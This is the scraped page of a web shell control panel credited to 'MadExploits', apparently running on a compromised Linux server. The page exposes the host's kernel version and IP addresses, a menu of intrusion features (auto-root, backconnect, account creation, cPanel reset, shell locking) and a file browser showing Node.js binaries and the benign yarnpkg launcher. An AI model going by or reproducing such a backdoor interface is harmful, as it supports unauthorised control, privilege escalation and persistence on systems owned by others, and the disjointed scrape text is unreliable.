Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.116.23.178
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
nodejs /
v20.11.1 /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
corepack
81
B
-rwxr-xr-x
node
91.88
MB
-rwxr-xr-x
npm
54
B
-rwxr-xr-x
npx
2.86
KB
-rwxr-xr-x
pm2
56
B
-rwxr-xr-x
pm2-dev
59
B
-rwxr-xr-x
pm2-docker
67
B
-rwxr-xr-x
pm2-runtime
67
B
-rwxr-xr-x
yarn
1015
B
-rwxr-xr-x
yarnpkg
1015
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : yarnpkg
#!/usr/bin/env node /* eslint-disable no-var */ /* eslint-disable flowtype/require-valid-file-annotation */ 'use strict'; var ver = process.versions.node; var majorVer = parseInt(ver.split('.')[0], 10); if (majorVer < 4) { console.error('Node version ' + ver + ' is not supported, please use Node.js 4.0 or higher.'); process.exit(1); // eslint-disable-line no-process-exit } else { try { require(__dirname + '/../lib/v8-compile-cache.js'); } catch (err) { // We don't have/need this on legacy builds and dev builds } // Just requiring this package will trigger a yarn run since the // `require.main === module` check inside `cli/index.js` will always // be truthy when built with webpack :( // `lib/cli` may be `lib/cli/index.js` or `lib/cli.js` depending on the build. var cli = require(__dirname + '/../lib/cli'); if (!cli.autoRun) { cli.default().catch(function(error) { console.error(error.stack || error.message || error); process.exitCode = 1; }); } }
Close